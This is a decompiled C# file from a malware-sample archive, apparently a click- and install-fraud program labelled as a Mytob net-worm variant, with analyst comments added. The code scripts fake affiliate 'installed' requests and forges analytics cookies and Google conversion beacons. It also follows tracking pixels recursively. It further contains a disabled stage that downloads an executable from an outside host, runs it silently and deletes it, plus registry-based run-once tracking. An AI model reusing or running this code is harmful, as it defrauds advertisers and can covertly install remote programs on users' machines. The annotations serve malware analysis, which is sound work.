MalwareSourceCode/MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/AffiliateExecuterNoWin/Program.cs

// Decompiled with JetBrains decompiler
// Type: AffiliateExecuterNoWin.Program
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using HTTPAgent;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace AffiliateExecuterNoWin
{
/// <summary>
/// Entry-point class of the decompiled sample. As listed, it performs a fixed, scripted
/// series of HTTP GET requests against affiliate, "install complete" and conversion-pixel
/// endpoints through an Agent object, then follows every pixel URL found in the responses.
/// </summary>
/// <remarks>
/// Analyst notes, limited to what this file shows:
/// - No self-propagation, mail or network-scanning logic appears in this class.
/// - Two stages are compiled in but switched off by hard-coded false flags in Main: a per-IP
///   run-once check stored in the registry, and a download-and-execute tail.
/// - Host artefacts those stages would leave if enabled: value "ips" under
///   HKCU\SOFTWARE\hazidtacp, and gamewrangler_v2.exe (under C:\Users\Public\Documents\ when
///   that directory exists) started with the argument "/s" and deleted afterwards.
/// - Agent and DataExtractor are defined outside this listing; their behaviour is inferred
///   only from how they are called here.
/// </remarks>
internal static class Program
{
// Base of the analytics beacon URL; assigned once in Main and read by createTrackingUrl.
private static string trackerUrlAndVersion;
/// <summary>
/// Runs the whole request script once and exits. The args parameter is never read.
/// </summary>
[STAThread]
private static void Main(string[] args)
{
// Referer value presented on the first affiliate request.
string str1 = "http://coolfbskins.info/getitnow";
// Name of the HKCU\SOFTWARE subkey used by GetSavedIPs / SetSavedIPs.
string appName = "hazidtacp";
// Gate for the per-IP run-once block below; hard-coded false, so that block is dead in this build.
bool flag1 = false;
// Public IP lookup page, fetched only inside the flag1 block.
string URL = "http://whatismyipaddress.com/";
// Gate for the download-and-execute tail; hard-coded false, so Main returns before reaching it.
bool flag2 = false;
// File name and plain-HTTP download URL used by that gated tail.
string str2 = "gamewrangler_v2.exe";
string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2;
Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2";
// Expiry-style check against 1 January 3000: never true in practice, so it does not stop execution.
if (new DateTime(3000, 1, 1) < DateTime.Now)
return;
// Agent comes from the HTTPAgent namespace (not in this listing).
// NOTE(review): EmulateBrowser presumably sets browser-like request headers - confirm in HTTPAgent.
Agent agent = new Agent();
agent.EmulateBrowser();
if (flag1)
{
// Takes the first IPv4-looking token from the lookup page; [0] throws if nothing matches.
string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0];
string savedIps = Program.GetSavedIPs(appName);
// Substring test against the ';'-separated list: exit if this address was already recorded.
if (savedIps.IndexOf(data) >= 0)
return;
Program.SetSavedIPs(appName, savedIps + data + ";");
}
if (!string.IsNullOrEmpty(str1))
agent.Referer = str1;
// Requests the affiliate link and follows the window.location target found in the response body.
string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0];
agent.GetURL(data1);
// Captured but never read again in Main.
string referer = agent.Referer;
// Scripted theme-selection, install-redirect and "installed" requests. The installid is a GUID
// generated on the spot; nothing in this method installs anything before these calls.
// NOTE(review): presumably intended to make the affiliate network record an install - confirm.
agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F");
agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/");
agent.Referer = "";
agent.GetURL("http://www.facetheme.com/install_redirect.php");
string upper = Guid.NewGuid().ToString().ToUpper();
agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0");
agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/");
agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft");
agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560");
// Conversion pixels are requested with the pixel page as Referer, and every URL embedded
// in the tracklead response is then fetched by GetRecursivePixels.
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID=");
Program.GetRecursivePixels(agent, url2);
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560");
// With flag2 == false execution ends here; everything below is unreachable in this build.
if (!flag2)
return;
if (Directory.Exists("C:\\Users\\Public\\Documents\\"))
str2 = "C:\\Users\\Public\\Documents\\" + str2;
// Download to disk, run with "/s", wait for exit, delete the file. No hash or signature check
// appears between the download and Process.Start, and the bare catch hides any failure.
// NOTE(review): "/s" is presumably a silent-install switch - confirm against the binary.
agent.getURL2File(url1, str2);
try
{
Process.Start(str2, "/s").WaitForExit();
System.IO.File.Delete(str2);
}
catch
{
}
}
/// <summary>
/// Extracts script, image and iframe URLs plus two kinds of conversion-tracking variables
/// from a response body, requests each resulting URL, and recurses into every response.
/// </summary>
/// <param name="agent">HTTP client whose Referer is reused for every request made here.</param>
/// <param name="html">Response body to scan.</param>
private static void GetRecursivePixels(Agent agent, string html)
{
// No RegexOptions are passed, so '.' does not cross line breaks: only noscript blocks that sit
// on a single line are stripped before extraction.
html = Regex.Replace(html, "<noscript>.*?</noscript>", "");
List<string> stringList = new List<string>();
// NOTE(review): "pt src=" presumably targets the tail of a script tag's src attribute - confirm.
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<SCRIPT language=\"javascript\" src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<IMG src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<img src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<iframe[^>]+?src=[\"']([^\"'\\\\]+)", "$1"));
// If the page declares google_conversion_* variables, the conversion request that the page's
// script would have produced is assembled by hand and queued with the other URLs.
string cid = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_id *= *([0-9]+)", "$1"));
if (cid != "")
{
string clang = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_language\\s*=\\s*\"([^\"]+)", "$1"));
string cformat = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_format\\s*=\\s*\"([^\"]+)", "$1"));
string ccolor = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_color\\s*=\\s*\"([^\"]+)", "$1"));
string clabel = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_label\\s*=\\s*\"([^\"]+)", "$1"));
stringList.Add(Program.createGoogleAdServicesURL(cid, clang, cformat, ccolor, clabel));
}
// Same treatment for filitrac_* variables.
string offerID = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_offer_id\\s*=\\s*'([^']+)", "$1"));
string referece = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_reference\\s*=\\s*'([^']+)", "$1"));
if (offerID != "")
stringList.Add(Program.createFilitracURL(offerID, referece));
// Referer is restored before each request so every extracted URL is requested with the
// Referer that was set when this call started.
string referer = agent.Referer;
foreach (string str in stringList)
{
agent.Referer = referer;
string URL = str.Trim().Replace("&amp;", "&");
string url = agent.GetURL(URL);
// No depth limit or visited-URL set is visible: how far this goes is decided entirely by
// the content the remote servers return.
Program.GetRecursivePixels(agent, url);
}
}
/// <summary>
/// Returns a string of <paramref name="len"/> characters drawn from A-Z, a-z and 0-9 using a
/// new System.Random. No caller appears in this listing.
/// </summary>
private static string randomString(int len)
{
string str1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Random random = new Random();
string str2 = "";
for (int index = 0; index < len; ++index)
str2 += (string) (object) str1[random.Next(str1.Length)];
return str2;
}
/// <summary>
/// Reads the "ips" value from HKCU\SOFTWARE\{appName}.
/// </summary>
/// <returns>The stored string, or ";" when the key is absent or any exception occurs.</returns>
private static string GetSavedIPs(string appName)
{
string savedIps = ";";
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, false);
// A key without an "ips" value makes GetValue return null; the resulting exception from
// ToString is swallowed below and the default ";" is returned.
if (registryKey != null)
savedIps = registryKey.GetValue("ips").ToString();
}
catch
{
}
return savedIps;
}
/// <summary>
/// Writes <paramref name="val"/> to the "ips" value under HKCU\SOFTWARE\{appName}, creating the
/// key when it does not exist. All exceptions are silently ignored.
/// </summary>
private static void SetSavedIPs(string appName, string val)
{
try
{
(Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, true) ?? Registry.CurrentUser.CreateSubKey("SOFTWARE\\" + appName)).SetValue("ips", (object) val);
}
catch
{
}
}
/// <summary>
/// Adds hand-built __utma, __utmb, __utmc and __utmz cookies for http://{domain}/ and
/// http://utm.trk.{domain}/ to the given container, each expiring after 1800 seconds.
/// No caller appears in this listing.
/// </summary>
public static void addTrackingCookies(CookieContainer cookies, string domain)
{
Random random = new Random();
Uri uri1 = new Uri("http://" + domain + "/");
Uri uri2 = new Uri("http://utm.trk." + domain + "/");
// Current Unix time in whole seconds.
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str1 = Program.uHash(domain);
// __utma value: hash, random number, then the same timestamp three times and a trailing 1.
string str2 = str1 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1";
// __utmz value carries a fixed utmcsr token, "ZJxdm025".
string str3 = str1 + "." + (object) totalSeconds + ".1.1.utmcsr=ZJxdm025|utmccn=(not+set)|utmcmd=(not+set)";
cookies.Add(uri1, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri1, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmz", str3, 1800));
cookies.Add(uri2, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri2, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmz", str3, 1800));
}
/// <summary>
/// Uses reflection to read CookieContainer's non-public m_domainTable field and re-keys the
/// entry equal to <paramref name="domain"/> under "." + domain. No caller appears in this listing.
/// </summary>
private static void BugFix_CookieDomain(CookieContainer cookieContainer, string domain)
{
// Depends on a private framework field; this throws on a runtime where that field name differs.
Hashtable hashtable = (Hashtable) typeof (CookieContainer).InvokeMember("m_domainTable", BindingFlags.Instance | BindingFlags.NonPublic | BindingFlags.GetField, (Binder) null, (object) cookieContainer, new object[0]);
// Iterates over a copy of the keys because the table is modified inside the loop.
foreach (string key1 in new ArrayList(hashtable.Keys))
{
string str = key1;
if (str == domain)
{
string key2 = "." + str;
hashtable[(object) key2] = hashtable[(object) key1];
hashtable.Remove((object) key1);
}
}
}
/// <summary>
/// Computes an integer hash of <paramref name="d"/>, processing characters from last to first,
/// and returns it as a decimal string.
/// </summary>
/// <remarks>
/// NOTE(review): used here for the leading field of the __utma/__utmz values; presumably meant
/// to match the analytics script's domain hash - confirm.
/// </remarks>
public static string uHash(string d)
{
int num1 = 0;
for (int startIndex = d.Length - 1; startIndex >= 0; --startIndex)
{
// Character code of the current character.
int num2 = (int) char.Parse(d.Substring(startIndex, 1));
// 268435455 is 0x0FFFFFFF: the shifted accumulator is kept to 28 bits before the additions.
num1 = (num1 << 6 & 268435455) + num2 + (num2 << 14);
int num3;
// 266338304 is 0x0FE00000: when any of bits 21-27 are set they are folded back in with XOR.
if ((num3 = num1 & 266338304) != 0)
num1 ^= num3 >> 21;
}
return num1.ToString();
}
/// <summary>
/// Creates a cookie that expires <paramref name="timeout"/> seconds after the current local time.
/// </summary>
public static Cookie createCookie(string name, string value, int timeout) => new Cookie(name, value)
{
Expires = DateTime.Now.AddSeconds((double) timeout)
};
/// <summary>
/// Pulls the utmdt, utmhn, utmr, utmp, utmac and utmcn parameters out of an existing beacon URL,
/// rebuilds a beacon with createTrackingUrl, optionally applies one string replacement, and
/// requests the result.
/// </summary>
/// <returns>Whatever agent.GetURL returns for the rebuilt URL.</returns>
public static string GetTrackingUrlByTemplate(
Agent agent,
string url,
string trackingSearch,
string trackingReplace,
string domain)
{
string title = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmdt=([^&]*)", "$1"));
string hostname = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmhn=([^&]*)", "$1"));
string referer = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmr=([^&]*)", "$1"));
string tracking = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmp=([^&]*)", "$1"));
string utmac = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmac=([^&]*)", "$1"));
bool addutmcn = !(Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "(&utmcn=1)", "$1")) == "");
string URL = Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, utmac, domain);
// NOTE(review): the guard uses ||, so Replace is reached when only one of the two strings is set.
if (!string.IsNullOrEmpty(trackingSearch) || !string.IsNullOrEmpty(trackingReplace))
URL = URL.Replace(trackingSearch, trackingReplace);
return agent.GetURL(URL);
}
/// <summary>
/// Returns the first element of <paramref name="arr"/>, or an empty string when it has none.
/// </summary>
public static string FirstOrEmpty(string[] arr) => arr.Length > 0 ? arr[0] : "";
/// <summary>
/// Builds a beacon URL with empty utmac and domain arguments and requests it.
/// </summary>
public static string sGetTrackingUrl(
Agent agent,
string title,
string hostname,
string referer,
string tracking,
bool addutmcn)
{
return agent.GetURL(Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, "", ""));
}
/// <summary>
/// Assembles a __utm.gif beacon URL on top of trackerUrlAndVersion, filling in the primary
/// screen resolution, random request identifiers and a synthesised cookie string.
/// </summary>
/// <remarks>
/// Fixed fields include utmcs=utf-8, utmsc=32-bit, utmul=en-us and utmfl=10.2 r159. Caller
/// values are concatenated as given, without URL encoding. trackerUrlAndVersion is only
/// assigned in Main.
/// </remarks>
public static string createTrackingUrl(
string title,
string hostname,
string referer,
string tracking,
bool addutmcn,
string utmac,
string domain)
{
Random random = new Random();
// "WIDTHxHEIGHT" of the primary display, sent as utmsr.
string str1 = Screen.PrimaryScreen.Bounds.Width.ToString() + "x" + (object) Screen.PrimaryScreen.Bounds.Height;
// Current Unix time in whole seconds.
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str2 = Program.uHash(domain);
// Percent-encoded utmcc value: a fresh __utma plus a __utmz that states "(direct)" as source.
string str3 = "__utma%3D" + (str2 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1") + "%3B%2B__utmz%3D" + (str2 + "." + (object) totalSeconds + ".1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B");
// utmdt and utmr are omitted when empty; utmcn=1 is appended only when addutmcn is true.
return Program.trackerUrlAndVersion + "&utms=1&utmn=" + (object) random.Next(int.MaxValue) + "&utmhn=" + hostname + "&utmcs=utf-8&utmsr=" + str1 + "&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.2%20r159" + (title == "" ? (object) "" : (object) ("&utmdt=" + title)) + "&utmhid=" + (object) random.Next(int.MaxValue) + (referer == "" ? (object) "" : (object) ("&utmr=" + referer)) + (addutmcn ? (object) "&utmcn=1" : (object) "") + "&utmp=" + tracking + "&utmac=" + utmac + "&utmcc=" + str3 + "&utmu=q~";
}
/// <summary>
/// Builds the filitrac Lead.aspx URL for the given offer id and reference, with iframe=1.
/// </summary>
private static string createFilitracURL(string offerID, string referece) => "http://www.filitrac.com/Lead.aspx?pid=" + offerID + "&ref=" + referece + "&iframe=1";
/// <summary>
/// Builds a googleadservices.com conversion URL from values scraped by GetRecursivePixels plus
/// the primary screen dimensions and the local UTC offset in minutes.
/// </summary>
/// <remarks>
/// The url parameter is a fixed successPixels page address, independent of the page that was
/// actually fetched.
/// </remarks>
private static string createGoogleAdServicesURL(
string cid,
string clang,
string cformat,
string ccolor,
string clabel)
{
// Unix time in milliseconds (whole seconds * 1000) plus a random 0-999 offset; used for both
// the random and fst parameters.
long num = 1000L * (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds + (long) new Random().Next(1000);
// A language such as "en_US" is split into hl ("en") and gl ("US"); gl is empty without '_'.
string[] strArray = clang.Split('_');
string str1 = strArray[0];
string str2 = strArray.Length <= 1 ? "" : strArray[1];
// Unused local: the offset is recomputed inline for u_tz in the return expression.
TimeSpan timeSpan = DateTime.Now - DateTime.UtcNow;
// u_ah is the screen height minus a fixed 30; u_cd, u_his, u_nplug and u_nmime are constants.
return "http://www.googleadservices.com/pagead/conversion/" + cid + "/?random=" + (object) num + "&cv=6&fst=" + (object) num + "&num=1&fmt=" + cformat + "&label=" + clabel + "&bg=" + ccolor + "&hl=" + str1 + "&gl=" + str2 + "&guid=ON&u_h=" + (object) Screen.PrimaryScreen.Bounds.Height + "&u_w=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_ah=" + (object) (Screen.PrimaryScreen.Bounds.Height - 30) + "&u_aw=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_cd=32&u_his=2&u_tz=" + (object) (int) (DateTime.Now - DateTime.UtcNow).TotalMinutes + "&u_nplug=0&u_nmime=0&url=http%3A//www.zwinky.com/dl/successPixels.jhtml";
}
}
}